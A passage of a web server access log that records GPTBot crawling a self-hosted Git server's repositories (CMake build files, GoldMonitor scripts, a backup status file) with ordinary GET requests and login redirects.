"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" +[17/Feb/2026:17:16:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api" [Client 74.7.227.38] [Length 9942] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api" +[17/Feb/2026:17:16:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api" [Client 74.7.227.38] [Length 9945] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api" +[17/Feb/2026:17:16:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake" [Client 74.7.227.38] [Length 9933] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake" +[17/Feb/2026:17:16:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake" [Client 74.7.227.38] [Length 9936] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake" +[17/Feb/2026:17:16:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" [Client 74.7.227.38] [Length 17060] [Gzip 12.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" +[17/Feb/2026:17:16:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1" [Client 74.7.227.38] [Length 9951] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1" +[17/Feb/2026:17:16:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/reply/index-2026-01-06T00-34-47-0208.json" [Client 74.7.227.38] [Length 14335] [Gzip 5.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/reply" +[17/Feb/2026:17:16:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/reply/index-2026-01-06T00-34-47-0208.json" [Client 74.7.227.38] [Length 14334] [Gzip 5.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/reply" +[17/Feb/2026:17:16:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode" [Client 74.7.227.38] [Length 9976] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode" +[17/Feb/2026:17:16:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode" [Client 74.7.227.38] [Length 9975] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode" +[17/Feb/2026:17:16:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/reply" [Client 74.7.227.38] [Length 9959] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/reply" +[17/Feb/2026:17:16:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/reply" [Client 74.7.227.38] [Length 9962] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/reply" +[17/Feb/2026:17:16:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/query" [Client 74.7.227.38] [Length 10012] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode" +[17/Feb/2026:17:16:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/query" [Client 74.7.227.38] [Length 10008] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode" +[17/Feb/2026:17:16:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1" [Client 74.7.227.38] [Length 9953] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1" +[17/Feb/2026:17:16:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 11353] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode" +[17/Feb/2026:17:16:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 11351] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode" +[17/Feb/2026:17:16:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/reply/index-2026-01-06T00-34-47-0208.json" [Client 74.7.227.38] [Length 2092] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/reply/index-2026-01-06T00-34-47-0208.json" +[17/Feb/2026:17:16:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/reply/index-2026-01-06T00-34-47-0208.json" [Client 74.7.227.38] [Length 2092] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/reply/index-2026-01-06T00-34-47-0208.json" +[17/Feb/2026:17:16:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/reply/index-2026-01-06T00-34-47-0208.json" [Client 74.7.227.38] [Length 14602] [Gzip 9.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/reply/index-2026-01-06T00-34-47-0208.json" +[17/Feb/2026:17:16:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/reply/index-2026-01-06T00-34-47-0208.json" [Client 74.7.227.38] [Length 9987] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/reply/index-2026-01-06T00-34-47-0208.json" +[17/Feb/2026:17:16:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/reply/index-2026-01-06T00-34-47-0208.json" [Client 74.7.227.38] [Length 14602] [Gzip 9.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/reply/index-2026-01-06T00-34-47-0208.json" +[17/Feb/2026:17:16:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/reply/index-2026-01-06T00-34-47-0208.json" [Client 74.7.227.38] [Length 9988] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/reply/index-2026-01-06T00-34-47-0208.json" +[17/Feb/2026:17:16:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/query" [Client 74.7.227.38] [Length 9961] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/query" +[17/Feb/2026:17:16:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/query" [Client 74.7.227.38] [Length 9963] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/query" +[17/Feb/2026:17:16:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/.Backup/status.json" [Client 74.7.227.38] [Length 9780] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/status.json" +[17/Feb/2026:17:16:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 9985] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode/query.json" +[17/Feb/2026:17:16:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 9984] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode/query.json" +[17/Feb/2026:17:16:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 144] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode/query.json" +[17/Feb/2026:17:16:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 144] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode/query.json" +[17/Feb/2026:17:16:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 10269] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode/query.json" +[17/Feb/2026:17:16:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 10270] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode/query.json" +[17/Feb/2026:17:16:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/GoldMonitor/GoldMonitor_KRX.py" [Client 74.7.227.38] [Length 18342] [Gzip 8.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_KRX.py" +[17/Feb/2026:17:16:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/branch/main/.Backup/status.json" [Client 74.7.227.38] [Length 10249] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/status.json" +[17/Feb/2026:17:16:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldMonitor/GoldMonitor_KRX.py" [Client 74.7.227.38] [Length 870] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_KRX.py" +[17/Feb/2026:17:16:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/.Backup/status.json" [Client 74.7.227.38] [Length 82] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/status.json" +[17/Feb/2026:17:16:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/.Backup/status.json" [Client 74.7.227.38] [Length 814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/status.json" +[17/Feb/2026:17:16:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" [Client 74.7.227.38] [Length 7578] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" +[17/Feb/2026:17:16:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" [Client 74.7.227.38] [Length 7578] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" +[17/Feb/2026:17:16:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" [Client 74.7.227.38] [Length 15650] [Gzip 6.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:17:16:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/GoldMonitor_V4.8.py" [Client 74.7.227.38] [Length 9791] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_V4.8.py" +[17/Feb/2026:17:16:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/GoldMonitor/GoldMonitor_V5.3.spec" [Client 74.7.227.38] [Length 11842] [Gzip 5.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_V5.3.spec" +[17/Feb/2026:17:16:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/GoldMonitor_v4.7.spec" [Client 74.7.227.38] [Length 9788] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_v4.7.spec" +[17/Feb/2026:17:16:56 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldMonitor/GoldMonitor_KRX.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/GoldMonitor_KRX.py" +[17/Feb/2026:17:16:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldMonitor/GoldMonitor_KRX.py" +[17/Feb/2026:17:16:57 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldMonitor/GoldMonitor_KRX.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/GoldMonitor_KRX.py" +[17/Feb/2026:17:16:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldMonitor/GoldMonitor_KRX.py" +[17/Feb/2026:17:16:57 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/.Backup/status.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/.Backup/status.json" +[17/Feb/2026:17:16:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/.Backup/status.json" +[17/Feb/2026:17:16:58 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/.Backup/status.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/.Backup/status.json" +[17/Feb/2026:17:16:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/.Backup/status.json" +[17/Feb/2026:17:16:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr 